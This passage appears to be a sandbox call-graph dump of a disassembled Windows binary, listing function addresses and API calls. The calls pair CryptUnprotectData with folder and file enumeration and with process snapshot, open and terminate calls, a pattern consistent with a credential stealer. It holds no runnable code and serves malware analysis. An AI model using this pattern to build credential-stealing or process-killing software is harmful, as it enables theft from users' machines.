__CreateFrameInfo 38273->38550 38274->38269 38276 36c0b6 error_info_injector 38274->38276 38278 356f10 96 API calls 38276->38278 38279 36c100 38278->38279 38280 35e940 41 API calls 38279->38280 38281 36c107 38280->38281 38282 374650 96 API calls 38281->38282 38286 36c115 __CreateFrameInfo 38282->38286 38283 36c35f 38284 374a11 CatchGuardHandler 5 API calls 38283->38284 38285 36c36e 38284->38285 38285->38119 38286->38283 38287 36c22c 38286->38287 38288 36c17f 38286->38288 38287->38283 38291 356f10 96 API calls 38287->38291 38289 36c187 38288->38289 38290 36c1d0 38288->38290 38292 356f10 96 API calls 38289->38292 38296 356f10 96 API calls 38290->38296 38293 36c33a 38291->38293 38294 36c1a9 38292->38294 38295 35e940 41 API calls 38293->38295 38297 35e940 41 API calls 38294->38297 38298 36c1b1 38295->38298 38299 36c205 38296->38299 38297->38298 38298->38273 38301 36c1ba 38298->38301 38300 35e940 41 API calls 38299->38300 38300->38298 38548 3664d0 41 API calls 4 library calls 38301->38548 38304 356f10 96 API calls 38303->38304 38305 36b310 38304->38305 38306 35e940 41 API calls 38305->38306 38307 36b317 38306->38307 38308 36b498 38307->38308 38310 36b33e 38307->38310 38551 37b1dd 39 API calls __CreateFrameInfo 38308->38551 38312 356f10 96 API calls 38310->38312 38311 36b49d 38313 380fd8 39 API calls 38311->38313 38314 36b35a 38312->38314 38315 36b4a2 38313->38315 38316 374780 96 API calls 38314->38316 38317 36b374 38316->38317 38317->38311 38318 36b3a6 error_info_injector 38317->38318 38319 356f10 96 API calls 38318->38319 38320 36b3f0 38319->38320 38321 35e940 41 API calls 38320->38321 38322 36b3f7 38321->38322 38323 374650 96 API calls 38322->38323 38324 36b405 38323->38324 38324->38324 38325 356f10 96 API calls 38324->38325 38326 36b46c 38325->38326 38327 374a11 CatchGuardHandler 5 API calls 38326->38327 38328 36b492 38327->38328 38328->38131 38330 356f10 96 API calls 38329->38330 38331 36be8d 38330->38331 38332 35e940 41 API calls 38331->38332 38333 36be94 38332->38333 38334 36beb2 38333->38334 38335 36bfca 38333->38335 38337 356f10 96 API calls 38334->38337 38552 37b1dd 39 API calls __CreateFrameInfo 38335->38552 38339 36becb 38337->38339 38338 36bfcf 38340 380fd8 39 API calls 38338->38340 38341 374780 96 API calls 38339->38341 38342 36bfd4 38340->38342 38343 36bedc 38341->38343 38343->38338 38344 36bf08 error_info_injector 38343->38344 38345 356f10 96 API calls 38344->38345 38346 36bf49 38345->38346 38347 35e940 41 API calls 38346->38347 38348 36bf50 38347->38348 38349 374650 96 API calls 38348->38349 38350 36bf5e 38349->38350 38351 36bf93 38350->38351 38352 36bf78 NtQuerySystemInformation 38350->38352 38353 356f10 96 API calls 38351->38353 38352->38351 38354 36bf80 38352->38354 38355 36bf91 38353->38355 38356 356070 41 API calls 38354->38356 38357 374a11 CatchGuardHandler 5 API calls 38355->38357 38356->38355 38358 36bfc4 38357->38358 38359 381089 38358->38359 38360 38109c ___std_exception_copy 38359->38360 38553 37e67a 38360->38553 38543->38104 38548->38283 38573 37e4d9 38553->38573 38574 37e4f1 38573->38574 38575 37e4de 38573->38575 38643 373af0 38644 373bd3 38643->38644 38650 373b0e 38643->38650 38645 35f110 41 API calls 38644->38645 38647 373be1 38645->38647 38646 373bea 38648 35f110 41 API calls 38646->38648 38649 373bf8 38648->38649 38650->38644 38650->38646 36334 35d8c1 36355 35d860 error_info_injector 36334->36355 36335 356f10 96 API calls 36335->36355 36336 35dff6 36542 37b1dd 39 API calls __CreateFrameInfo 36336->36542 36338 35dffb 36543 380fd8 36338->36543 36340 35e940 41 API calls 36340->36355 36342 35d9c3 SHGetFolderPathA 36342->36355 36344 360fc0 41 API calls 36344->36355 36345 35dc34 GetFileAttributesA 36345->36355 36348 35dfe0 36535 374a11 36348->36535 36350 35dff2 36352 3664d0 41 API calls 36352->36355 36353 35f110 41 API calls 36353->36355 36355->36334 36355->36335 36355->36336 36355->36338 36355->36340 36355->36344 36355->36345 36355->36348 36355->36352 36355->36353 36356 3741e0 CreateToolhelp32Snapshot Process32FirstW 36355->36356 36369 35ce40 36355->36369 36446 356f10 36355->36446 36496 35ff80 36355->36496 36511 35eb40 36355->36511 36534 35e730 5 API calls CatchGuardHandler 36355->36534 36357 3743b6 CloseHandle Sleep 36356->36357 36366 374231 error_info_injector 36356->36366 36358 374a11 CatchGuardHandler 5 API calls 36357->36358 36360 3743d5 36358->36360 36360->36355 36362 3743db 36365 380fd8 39 API calls 36362->36365 36363 374393 Process32NextW 36363->36357 36363->36366 36364 37436d OpenProcess 36364->36363 36367 374383 TerminateProcess CloseHandle 36364->36367 36368 3743e0 36365->36368 36366->36362 36366->36363 36366->36364 36548 373990 36366->36548 36567 36eb70 36366->36567 36367->36363 36697 355dd0 36369->36697 36371 35ce78 36372 356f10 96 API calls 36371->36372 36373 35cea0 36372->36373 36706 35e940 36373->36706 36375 35cea7 36729 35f110 36375->36729 36377 35cec4 36378 35f110 41 API calls 36377->36378 36379 35cef6 36378->36379 36381 356f10 96 API calls 36379->36381 36421 35cf9a error_info_injector 36379->36421 36380 35f7b0 41 API calls 36382 35d096 FindFirstFileA 36380->36382 36383 35cf26 36381->36383 36444 35d0c3 error_info_injector 36382->36444 36384 35e940 41 API calls 36383->36384 36385 35cf2e 36384->36385 36386 35cf55 36385->36386 36387 35d79e 36385->36387 36392 356f10 96 API calls 36386->36392 37427 37b1dd 39 API calls __CreateFrameInfo 36387->37427 36390 35d7a3 36393 380fd8 39 API calls 36390->36393 36391 35d523 37280 36d5a0 36391->37280 36394 35cf6f 36392->36394 36395 35d7a8 36393->36395 36759 35f7b0 36394->36759 36397 380fd8 39 API calls 36395->36397 36400 35d7ad 36397->36400 36399 35d53f __CreateFrameInfo 36406 356f10 96 API calls 36399->36406 36403 380fd8 39 API calls 36400->36403 36402 35d519 FindNextFileA 36402->36391 36402->36444 36405 35d7b2 36403->36405 36407 380fd8 39 API calls 36405->36407 36408 35d581 36406->36408 36409 35d7b7 36407->36409 37300 3564a0 36408->37300 36411 35eb40 41 API calls 36414 35d5d9 36411->36414 36412 35d0e8 36412->36400 36415 35d122 error_info_injector 36412->36415 36413 35d592 error_info_injector 36413->36405 36413->36411 37315 356560 GetTempPathA 36414->37315 36417 374a11 CatchGuardHandler 5 API calls 36415->36417 36420 35d798 36417->36420 36420->36355 36421->36380 36421->36390 36421->36400 36421->36412 36423 356f10 96 API calls 36435 35d688 error_info_injector 36423->36435 36425 35f7b0 41 API calls 36425->36444 36427 35d639 _Yarn __Getctype 36427->36435 37417 354400 36427->37417 36431 35d5fd 36431->36427 37425 37b078 39 API calls 2 library calls 36431->37425 36432 37b1b7 ___std_exception_copy 14 API calls 36432->36435 36434 35d62b 37426 37a0d0 66 API calls ___std_exception_copy 36434->37426 36435->36390 36435->36423 36436 35d72f 36435->36436 36437 35d71f Sleep 36435->36437 36438 37b1b7 ___std_exception_copy 14 API calls 36436->36438 36437->36435 36442 35d735 36438->36442 36440 356f10 96 API calls 36440->36444 36441 35e940 41 API calls 36441->36444 36442->36405 36442->36415 36443 35f110 41 API calls 36443->36444 36444->36390 36444->36391 36444->36395 36444->36402 36444->36425 36444->36440 36444->36441 36444->36443 36767 35ecd0 36444->36767 36772 35ed40 36444->36772 36777 359630 36444->36777 36467 356f2f _Yarn __CreateFrameInfo error_info_injector 36446->36467 36449 356fa7 36451 374c1c std::_Facet_Register 41 API calls 36449->36451 36452 356f3b _Yarn 36449->36452 36450 374c1c std::_Facet_Register 41 API calls 36450->36467 36451->36452 36452->36342 36455 37b1dd 39 API calls __FrameHandler3::FrameUnwindToState 36455->36467 36456 357265 lstrlenA 36456->36467 36457 380fd8 39 API calls 36457->36467 36458 357949 error_info_injector 36459 374a11 CatchGuardHandler 5 API calls 36458->36459 36461 357960 36459->36461 36461->36342 36462 3572b1 GetProcessHeap HeapAlloc 36462->36467 36463 35f110 41 API calls 36463->36467 36464 357577 error_info_injector 36465 374a11 CatchGuardHandler 5 API calls 36464->36465 36469 357591 36465->36469 36466 35ecd0 41 API calls 36466->36467 36467->36446 36467->36449 36467->36450 36467->36452 36467->36455 36467->36456 36467->36457 36467->36458 36467->36462 36467->36463 36467->36464 36467->36466 36468 35734f GetProcessHeap HeapFree 36467->36468 36470 357349 CryptUnprotectData 36467->36470 36471 35ee10 41 API calls 36467->36471 36472 357c0b GetFileAttributesA 36467->36472 36473 356f10 85 API calls 36467->36473 36474 3585f9 GetFileAttributesA 36467->36474 36475 373c10 85 API calls 36467->36475 36476 35e940 41 API calls 36467->36476 36477 360fc0 41 API calls 36467->36477 36478 3591e1 GetFileAttributesA 36467->36478 36479 35f9e0 85 API calls 36467->36479 36480 35f970 41 API calls 36467->36480 36481 35edc0 39 API calls 36467->36481 36482 35e730 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36467->36482 36483 35f990 85 API calls 36467->36483 36484 35f7b0 41 API calls 36467->36484 36485 3595cf error_info_injector 36467->36485 36487 35ff80 41 API calls 36467->36487 36488 356070 41 API calls 36467->36488 36490 35f8d0 41 API calls 36467->36490 36491 355340 46 API calls 36467->36491 36492 3558c0 20 API calls 36467->36492 36493 355ce0 6 API calls 36467->36493 36495 3558c0 20 API calls 36467->36495 37701 356060 41 API calls CatchGuardHandler 36467->37701 37702 355fc0 41 API calls 3 library calls 36467->37702 37703 360220 41 API calls Concurrency::cancel_current_task 36467->37703 37704 35fad0 36467->37704 37713 3664d0 41 API calls 4 library calls 36467->37713 36468->36467 36469->36342 36470->36467 36470->36468 36471->36467 36472->36467 36473->36467 36474->36467 36475->36467 36476->36467 36477->36467 36478->36467 36479->36467 36480->36467 36481->36467 36482->36467 36483->36467 36484->36467 36486 374a11 CatchGuardHandler 5 API calls 36485->36486 36489 3595e6 36486->36489 36487->36467 36488->36467 36489->36342 36490->36467 36491->36467 36494 35786c GetProcessHeap HeapFree 36492->36494 36493->36467 36494->36467 36495->36467 36497 3600ce 36496->36497 36498 35ffab 36496->36498 36499 3600d3 36497->36499 37773 356060 41 API calls CatchGuardHandler 36497->37773 36502 35fff2 36498->36502 36503 36001c 36498->36503 37774 355fc0 41 API calls 3 library calls 36499->37774 36502->36499 36505 35fffd 36502->36505 36506 374c1c std::_Facet_Register 41 API calls 36503->36506 36509 360003 _Yarn 36503->36509 36504 380fd8 39 API calls 36507 3600dd 36504->36507 36508 374c1c std::_Facet_Register 41 API calls 36505->36508 36506->36509 36508->36509 36509->36504 36510 36008c _Yarn error_info_injector 36509->36510 36510->36355 36512 35eb68 36511->36512 36531 35ec65 36511->36531 36513 35ebc7 36512->36513 36514 35eb6f 36512->36514 36515 35ec4e 36512->36515 36516 35eb9b 36512->36516 36517 35ebf3 36512->36517 36521 374c1c std::_Facet_Register 41 API calls 36513->36521 36518 374c1c std::_Facet_Register 41 API calls 36514->36518 36519 374c1c std::_Facet_Register 41 API calls 36515->36519 36520 374c1c std::_Facet_Register 41 API calls 36516->36520 36517->36355 36522 35eb79 36518->36522 36523 35ec58 36519->36523 36524 35eba5 36520->36524 36525 35ebd1 36521->36525 37775 366230 36522->37775 37790 3659a0 41 API calls Concurrency::cancel_current_task 36523->37790 37780 3661a0 36524->37780 36529 35ee10 41 API calls 36525->36529 36533 35ebde 36529->36533 36531->36355 36533->36355 36534->36355 36536 374a1a IsProcessorFeaturePresent 36535->36536 36537 374a19 36535->36537 36539 374a5c 36536->36539 36537->36350 37819 374a1f SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36539->37819 36541 374b3f 36541->36350 37820 380f14 39 API calls ___std_exception_copy 36543->37820 36546 380fe7 36546->36543 36547 395830 error_info_injector 36546->36547 37821 380ff5 IsProcessorFeaturePresent 36546->37821 36547->36338 36549 3739da __CreateFrameInfo 36548->36549 36550 3739c5 36548->36550 36575 375c84 36549->36575 36552 3739d1 36550->36552 36553 373ada 36550->36553 36630 360f60 41 API calls 2 library calls 36552->36630 36631 35f560 41 API calls 36553->36631 36555 3739fe 36587 3743f0 36555->36587 36557 373adf 36559 380fd8 39 API calls 36557->36559 36560 373ae4 36559->36560 36561 36eb70 41 API calls 36562 373a92 36561->36562 36562->36557 36564 373abb error_info_injector 36562->36564 36565 374a11 CatchGuardHandler 5 API calls 36564->36565 36566 373ad4 36565->36566 36566->36366 36568 36ec0e 36567->36568 36572 36eb8f 36567->36572 36696 356060 41 API calls CatchGuardHandler 36568->36696 36570 36eb9b _Yarn 36570->36366 36571 36ec13 36572->36570 36695 360f60 41 API calls 2 library calls 36572->36695 36574 36ebe2 _Yarn 36574->36366 36576 375c90 __EH_prolog3 36575->36576 36632 375a93 36576->36632 36581 375cae 36646 375e0c 41 API calls std::locale::_Setgloballocale 36581->36646 36583 375d0c std::locale::_Init 36583->36555 36584 375cb6 36647 375bce 15 API calls 2 library calls 36584->36647 36586 375ccc 36638 375aeb 36586->36638 36588 375a93 std::_Lockit::_Lockit 7 API calls 36587->36588 36589 374416 36588->36589 36590 375a93 std::_Lockit::_Lockit 7 API calls 36589->36590 36596 374451 36589->36596 36592 374431 36590->36592 36591 374470 36593 375aeb std::_Lockit::~_Lockit 2 API calls 36591->36593 36594 375aeb std::_Lockit::~_Lockit 2 API calls 36592->36594 36595 374478 36593->36595 36594->36596 36597 374a11 CatchGuardHandler 5 API calls 36595->36597 36596->36591 36652 374c1c 36596->36652 36599 373a0d 36597->36599 36599->36561 36600 3744b9 36601 375a93 std::_Lockit::_Lockit 7 API calls 36600->36601 36602 3744e3 36601->36602 36603 374521 36602->36603 36604 37463c 36602->36604 36666 375d84 67 API calls 2 library calls 36603->36666 36674 37588a 41 API calls CallUnexpected 36604->36674 36607 374646 36608 37452b 36667 375f39 40 API calls __Getctype 36608->36667 36610 374541 36668 375fa4 39 API calls 2 library calls 36610->36668 36612 374557 36669 375dcf 66 API calls std::_Locinfo::_Locinfo_ctor 36612->36669 36614 374582 36615 374592 36614->36615 36670 37b1b7 36614->36670 36617 3745a9 36615->36617 36618 37b1b7 ___std_exception_copy 14 API calls 36615->36618 36619 3745c0 36617->36619 36621 37b1b7 ___std_exception_copy 14 API calls 36617->36621 36618->36617 36620 3745d7 36619->36620 36622 37b1b7 ___std_exception_copy 14 API calls 36619->36622 36623 3745ee 36620->36623 36624 37b1b7 ___std_exception_copy 14 API calls 36620->36624 36621->36619 36622->36620 36625 374605 36623->36625 36626 37b1b7 ___std_exception_copy 14 API calls 36623->36626 36624->36623 36627 375aeb std::_Lockit::~_Lockit 2 API calls 36625->36627 36626->36625 36628 374617 36627->36628 36673 375c52 41 API calls std::_Facet_Register 36628->36673 36630->36549 36633 375aa2 36632->36633 36634 375aa9 36632->36634 36648 383fb8 6 API calls 2 library calls 36633->36648 36636 375aa7 36634->36636 36649 37616e EnterCriticalSection 36634->36649 36636->36586 36645 375de9 41 API calls 2 library calls 36636->36645 36639 375af5 36638->36639 36640 383fc6 36638->36640 36644 375b08 36639->36644 36650 37617c LeaveCriticalSection 36639->36650 36651 383fa1 LeaveCriticalSection 36640->36651 36643 383fcd 36643->36583 36644->36583 36645->36581 36646->36584 36647->36586 36648->36636 36649->36636 36650->36644 36651->36643 36654 374c21 36652->36654 36655 374c3b 36654->36655 36657 374c3d 36654->36657 36675 37b1d2 36654->36675 36684 381349 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 36654->36684 36655->36600 36658 374c47 std::_Facet_Register 36657->36658 36659 355fc0 Concurrency::cancel_current_task 36657->36659 36685 37650e RaiseException 36658->36685 36682 37650e RaiseException 36659->36682 36662 355fdc 36683 37627c 40 API calls ___std_exception_copy 36662->36683 36663 37517e 36665 356003 36665->36600 36666->36608 36667->36610 36668->36612 36669->36614 36688 38524e 36670->36688 36673->36591 36674->36607 36681 38665c __Wcrtomb 36675->36681 36676 38669a 36687 37b13c 14 API calls __Wcrtomb 36676->36687 36678 386685 RtlAllocateHeap 36679 386698 36678->36679 36678->36681 36679->36654 36681->36676 36681->36678 36686 381349 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 36681->36686 36682->36662 36683->36665 36684->36654 36685->36663 36686->36681 36687->36679 36689 385259 RtlFreeHeap 36688->36689 36690 37b1cf 36688->36690 36689->36690 36691 38526e GetLastError 36689->36691 36690->36615 36692 38527b __dosmaperr 36691->36692 36694 37b13c 14 API calls __Wcrtomb 36692->36694 36694->36690 36695->36574 36696->36571 36698 355ddf __Getctype 36697->36698 36699 355e52 36698->36699 37428 354550 15 API calls 2 library calls 36698->37428 36699->36371 36701 355e45 36702 37b1b7 ___std_exception_copy 14 API calls 36701->36702 36702->36699 36703 355e0a 36703->36701 36704 355e5b 36703->36704 36705 354400 69 API calls 36703->36705 36704->36371 36705->36701 36707 35e950 36706->36707 36714 35e973 36706->36714 36708 374c1c std::_Facet_Register 41 API calls 36707->36708 36710 35e95a 36708->36710 36709 35eac0 37434 37b1dd 39 API calls __CreateFrameInfo 36709->37434 36712 374c1c std::_Facet_Register 41 API calls 36710->36712 36712->36714 36713 35eac5 37435 356100 41 API calls 36713->37435 36714->36709 36719 35e992 36714->36719 36716 35ea01 36717 374c1c std::_Facet_Register 41 API calls 36716->36717 36720 35ea0d 36717->36720 36718 380fd8 39 API calls 36721 35eacf 36718->36721 36719->36713 36719->36716 36728 35ea72 36719->36728 37429 35ef10 36720->37429 36724 35f110 41 API calls 36721->36724 36727 35eae2 36724->36727 36725 35eaaa error_info_injector 36725->36375 36727->36375 36728->36718 36728->36725 36733 35f133 36729->36733 36736 35f1cd 36729->36736 36730 35f3a5 36731 35f410 error_info_injector 36730->36731 36741 35f3d2 36730->36741 36742 35f409 36730->36742 36747 35f417 36730->36747 36732 374a11 CatchGuardHandler 5 API calls 36731->36732 36735 35f4bf 36732->36735 36733->36731 36734 35f4ca 36733->36734 36755 35f168 36733->36755 37445 35f5e0 41 API calls 36733->37445 37454 35f560 41 API calls 36734->37454 36735->36377 36736->36730 36736->36731 36736->36734 36746 35f210 36736->36746 37446 35f5e0 41 API calls 36736->37446 36739 35f39d 37449 35f570 36739->37449 36745 3603b0 41 API calls 36741->36745 36748 35f570 39 API calls 36742->36748 36754 35f3e1 error_info_injector 36745->36754 36746->36755 37447 3639e0 41 API calls 36746->37447 36747->36731 36750 35f4c5 36747->36750 36748->36731 36751 380fd8 39 API calls 36750->36751 36751->36734 36753 35ead0 41 API calls 36753->36755 36757 374a11 CatchGuardHandler 5 API calls 36754->36757 36755->36739 36755->36753 37437 3603b0 36755->37437 37448 3639e0 41 API calls 36755->37448 36758 35f403 36757->36758 36758->36377 36760 35f7d0 36759->36760 36760->36760 37458 356060 41 API calls CatchGuardHandler 36760->37458 36762 35f8c3 37459 355fc0 41 API calls 3 library calls 36762->37459 36764 35f8c8 36765 380fd8 39 API calls 36764->36765 36766 35f8cd 36765->36766 36768 35ece0 36767->36768 36768->36768 36769 35ff80 41 API calls 36768->36769 36770 35ecf8 _Yarn 36768->36770 36771 35ed38 36769->36771 36770->36444 36771->36444 36773 35ed55 36772->36773 36774 35ff80 41 API calls 36773->36774 36776 35ed65 _Yarn 36773->36776 36775 35eda9 36774->36775 36775->36444 36776->36444 36778 356f10 96 API calls 36777->36778 36779 359682 36778->36779 36780 35e940 41 API calls 36779->36780 36781 359689 36780->36781 36782 35b446 36781->36782 36784 356f10 96 API calls 36781->36784 37611 37b1dd 39 API calls __CreateFrameInfo 36782->37611 36787 3596cc 36784->36787 36785 35b44b 36786 380fd8 39 API calls 36785->36786 36788 35b450 36786->36788 36789 35f7b0 41 API calls 36787->36789 37612 37b1dd 39 API calls __CreateFrameInfo 36788->37612 36791 3596de 36789->36791 37460 360fc0 36791->37460 36792 35b455 36794 380fd8 39 API calls 36792->36794 36795 35b45a 36794->36795 37613 37b1dd 39 API calls __CreateFrameInfo 36795->37613 36797 3596fa error_info_injector 36797->36785 36798 356f10 96 API calls 36797->36798 36800 3597ae 36798->36800 36799 35b45f 36801 380fd8 39 API calls 36799->36801 36802 35e940 41 API calls 36800->36802 36803 35b464 36801->36803 36804 3597b5 36802->36804 37614 37b1dd 39 API calls __CreateFrameInfo 36803->37614 36804->36788 36808 356f10 96 API calls 36804->36808 36806 35b469 36807 380fd8 39 API calls 36806->36807 36809 35b46e 36807->36809 36810 3597f8 36808->36810 37615 37b1dd 39 API calls __CreateFrameInfo 36809->37615 36812 35f7b0 41 API calls 36810->36812 36815 35980a 36812->36815 36813 35b473 36814 380fd8 39 API calls 36813->36814 36817 35b478 36814->36817 36816 360fc0 41 API calls 36815->36816 36823 359823 error_info_injector 36816->36823 37616 37b1dd 39 API calls __CreateFrameInfo 36817->37616 36819 35b47d 36820 380fd8 39 API calls 36819->36820 36821 35b4a0 36820->36821 36826 356f10 96 API calls 36821->36826 36822 356f10 96 API calls 36824 3598d7 36822->36824 36823->36792 36823->36822 36825 35e940 41 API calls 36824->36825 36827 3598de 36825->36827 36828 35b4ff 36826->36828 36827->36795 36831 356f10 96 API calls 36827->36831 36829 35e940 41 API calls 36828->36829 36830 35b506 36829->36830 36832 35ccba 36830->36832 36837 356f10 96 API calls 36830->36837 36834 359921 36831->36834 37617 37b1dd 39 API calls __CreateFrameInfo 36832->37617 36836 35f7b0 41 API calls 36834->36836 36835 35ccbf 36838 380fd8 39 API calls 36835->36838 36839 359933 36836->36839 36840 35b549 36837->36840 36842 35ccc4 36838->36842 36843 360fc0 41 API calls 36839->36843 36841 35f7b0 41 API calls 36840->36841 36844 35b558 36841->36844 37618 37b1dd 39 API calls __CreateFrameInfo 36842->37618 36849 35994c error_info_injector 36843->36849 36846 360fc0 41 API calls 36844->36846 36859 35b56e error_info_injector 36846->36859 36847 35ccc9 36848 380fd8 39 API calls 36847->36848 36851 35ccce 36848->36851 36849->36799 36850 356f10 96 API calls 36849->36850 36852 359a00 36850->36852 37619 37b1dd 39 API calls __CreateFrameInfo 36851->37619 36855 35e940 41 API calls 36852->36855 36854 356f10 96 API calls 36857 35b613 36854->36857 36858 359a07 36855->36858 36856 35ccd3 36860 380fd8 39 API calls 36856->36860 36861 35e940 41 API calls 36857->36861 36858->36803 36866 356f10 96 API calls 36858->36866 36859->36835 36859->36854 36862 35ccd8 36860->36862 36864 35b61a 36861->36864 37620 37b1dd 39 API calls __CreateFrameInfo 36862->37620 36864->36842 36871 356f10 96 API calls 36864->36871 36865 35ccdd 36867 380fd8 39 API calls 36865->36867 36868 359a4a 36866->36868 36870 35ccfb 36867->36870 36869 35f7b0 41 API calls 36868->36869 36872 359a5c 36869->36872 36873 35b65d 36871->36873 36874 360fc0 41 API calls 36872->36874 36875 35f7b0 41 API calls 36873->36875 36880 359a75 error_info_injector 36874->36880 36876 35b66c 36875->36876 36877 360fc0 41 API calls 36876->36877 36884 35b682 error_info_injector 36877->36884 36878 356f10 96 API calls 36879 359b29 36878->36879 36881 35e940 41 API calls 36879->36881 36880->36806 36880->36878 36883 359b30 36881->36883 36882 356f10 96 API calls 36885 35b727 36882->36885 36883->36809 36888 356f10 96 API calls 36883->36888 36884->36847 36884->36882 36886 35e940 41 API calls 36885->36886 36887 35b72e 36886->36887 36887->36851 36890 356f10 96 API calls 36887->36890 36889 359b73 36888->36889 36891 35f7b0 41 API calls 36889->36891 36892 35b771 36890->36892 36893 359b85 36891->36893 36894 35f7b0 41 API calls 36892->36894 36895 360fc0 41 API calls 36893->36895 36896 35b780 36894->36896 36899 359b9e error_info_injector 36895->36899 36897 360fc0 41 API calls 36896->36897 36905 35b796 error_info_injector 36897->36905 36898 356f10 96 API calls 36900 359c52 36898->36900 36899->36813 36899->36898 36902 35e940 41 API calls 36900->36902 36901 356f10 96 API calls 36903 35b83b 36901->36903 36904 359c59 36902->36904 36906 35e940 41 API calls 36903->36906 36904->36817 36908 356f10 96 API calls 36904->36908 36905->36856 36905->36901 36907 35b842 36906->36907 36907->36862 36911 356f10 96 API calls 36907->36911 36909 359c9c 36908->36909 36910 35f7b0 41 API calls 36909->36910 36912 359cae 36910->36912 36913 35b885 36911->36913 36914 360fc0 41 API calls 36912->36914 36915 35f7b0 41 API calls 36913->36915 36918 359cc7 error_info_injector 36914->36918 36916 35b894 36915->36916 36917 360fc0 41 API calls 36916->36917 36921 35b8aa error_info_injector 36917->36921 36918->36819 36922 35a134 36918->36922 37477 35ee10 36918->37477 36920 359d7b 37494 373c10 36920->37494 36921->36865 36924 35ee10 41 API calls 36921->36924 36929 35bd90 36921->36929 36925 35ee10 41 API calls 36922->36925 36936 35a5c1 36922->36936 36927 35b949 36924->36927 36930 35a153 36925->36930 36928 373c10 96 API calls 36927->36928 36932 35b955 36928->36932 36933 35ee10 41 API calls 36929->36933 36943 35c2c3 36929->36943 36934 373c10 96 API calls 36930->36934 36931 35f990 96 API calls 36935 359d99 36931->36935 36937 356f10 96 API calls 36932->36937 36938 35bdaf 36933->36938 36939 35a15f 36934->36939 36940 35f9e0 96 API calls 36935->36940 36941 35ee10 41 API calls 36936->36941 36950 35aa4e 36936->36950 36942 35b97c 36937->36942 36944 373c10 96 API calls 36938->36944 36945 356f10 96 API calls 36939->36945 36946 359da6 36940->36946 36947 35a5e0 36941->36947 36949 35e940 41 API calls 36942->36949 36951 35ee10 41 API calls 36943->36951 36967 35c727 36943->36967 36952 35bdbb 36944->36952 36953 35a186 36945->36953 36954 356070 41 API calls 36946->36954 36948 373c10 96 API calls 36947->36948 36955 35a5ec 36948->36955 36956 35b983 36949->36956 36957 35ee10 41 API calls 36950->36957 36977 35aedb 36950->36977 36958 35c2e2 36951->36958 36959 356f10 96 API calls 36952->36959 36960 35e940 41 API calls 36953->36960 36961 359dbd 36954->36961 36962 356f10 96 API calls 36955->36962 36956->36832 36981 356f10 96 API calls 36956->36981 36963 35aa6d 36957->36963 36964 373c10 96 API calls 36958->36964 36965 35bde2 36959->36965 36966 35a18d 36960->36966 36969 35f990 96 API calls 36961->36969 36972 35a613 36962->36972 36974 373c10 96 API calls 36963->36974 36975 35c2ee 36964->36975 36976 35e940 41 API calls 36965->36976 36966->36782 36986 356f10 96 API calls 36966->36986 36968 35cb8b 36967->36968 36970 35ee10 41 API calls 36967->36970 36973 35ee10 41 API calls 36968->36973 36971 359dcf 36969->36971 36978 35c746 36970->36978 36979 35f9e0 96 API calls 36971->36979 36980 35e940 41 API calls 36972->36980 37030 35cb98 error_info_injector 36973->37030 36982 35aa79 36974->36982 36983 356f10 96 API calls 36975->36983 36984 35bde9 36976->36984 36985 35ee10 41 API calls 36977->36985 36997 35b14a 36977->36997 36987 373c10 96 API calls 36978->36987 36988 359ddc 36979->36988 36989 35a61a 36980->36989 36990 35b9ba 36981->36990 36991 356f10 96 API calls 36982->36991 36992 35c315 36983->36992 36984->36832 37006 356f10 96 API calls 36984->37006 36993 35aefa 36985->36993 36995 35a1d0 36986->36995 36996 35c752 36987->36996 37007 35ff80 41 API calls 36988->37007 37015 359ded 36988->37015 36989->36782 37016 356f10 96 API calls 36989->37016 36998 356070 41 API calls 36990->36998 36999 35aaa0 36991->36999 37000 35e940 41 API calls 36992->37000 36994 373c10 96 API calls 36993->36994 37001 35af06 36994->37001 37002 356070 41 API calls 36995->37002 37003 356f10 96 API calls 36996->37003 37008 35ee10 41 API calls 36997->37008 37044 35b2a2 error_info_injector 36997->37044 37009 35b9cb 36998->37009 37004 35e940 41 API calls 36999->37004 37005 35c31d 37000->37005 37010 356f10 96 API calls 37001->37010 37011 35a1e1 37002->37011 37012 35c779 37003->37012 37013 35aaa7 37004->37013 37005->36832 37031 356f10 96 API calls 37005->37031 37014 35be20 37006->37014 37007->37015 37017 35b169 37008->37017 37018 356f10 96 API calls 37009->37018 37019 35af2d 37010->37019 37020 356f10 96 API calls 37011->37020 37021 35e940 41 API calls 37012->37021 37013->36782 37039 356f10 96 API calls 37013->37039 37022 356070 41 API calls 37014->37022 37023 360fc0 41 API calls 37015->37023 37024 35a65d 37016->37024 37025 373c10 96 API calls 37017->37025 37026 35b9f2 37018->37026 37027 35e940 41 API calls 37019->37027 37028 35a20c 37020->37028 37029 35c781 37021->37029 37032 35be31 37022->37032 37033 359e60 37023->37033 37034 356070 41 API calls 37024->37034 37035 35b175 37025->37035 37036 35e940 41 API calls 37026->37036 37056 35af34 37027->37056 37037 35e940 41 API calls 37028->37037 37029->36832 37059 356f10 96 API calls 37029->37059 37038 374a11 CatchGuardHandler 5 API calls 37030->37038 37040 35c354 37031->37040 37041 356f10 96 API calls 37032->37041 37049 359e75 37033->37049 37051 35ff80 41 API calls 37033->37051 37042 35a66e 37034->37042 37535 35f990 37035->37535 37055 35b9f9 37036->37055 37057 35a213 37037->37057 37045 35ccb4 37038->37045 37046 35aaea 37039->37046 37047 356070 41 API calls 37040->37047 37048 35be58 37041->37048 37050 356f10 96 API calls 37042->37050 37058 374a11 CatchGuardHandler 5 API calls 37044->37058 37045->36444 37060 356070 41 API calls 37046->37060 37061 35c365 37047->37061 37062 35e940 41 API calls 37048->37062 37053 360fc0 41 API calls 37049->37053 37063 35a699 37050->37063 37051->37049 37064 359efc 37053->37064 37055->36832 37066 356f10 96 API calls 37055->37066 37056->36782 37067 356f10 96 API calls 37056->37067 37057->36782 37079 356f10 96 API calls 37057->37079 37068 35b440 37058->37068 37069 35c7b8 37059->37069 37070 35aafb 37060->37070 37071 356f10 96 API calls 37061->37071 37072 35be5f 37062->37072 37073 35e940 41 API calls 37063->37073 37075 355340 46 API calls 37064->37075 37077 35ba3c 37066->37077 37078 35af77 37067->37078 37068->36444 37080 356070 41 API calls 37069->37080 37081 356f10 96 API calls 37070->37081 37082 35c38c 37071->37082 37072->36832 37097 356f10 96 API calls 37072->37097 37074 35a6a0 37073->37074 37074->36782 37098 356f10 96 API calls 37074->37098 37168 359f19 error_info_injector 37075->37168 37076 356070 41 API calls 37083 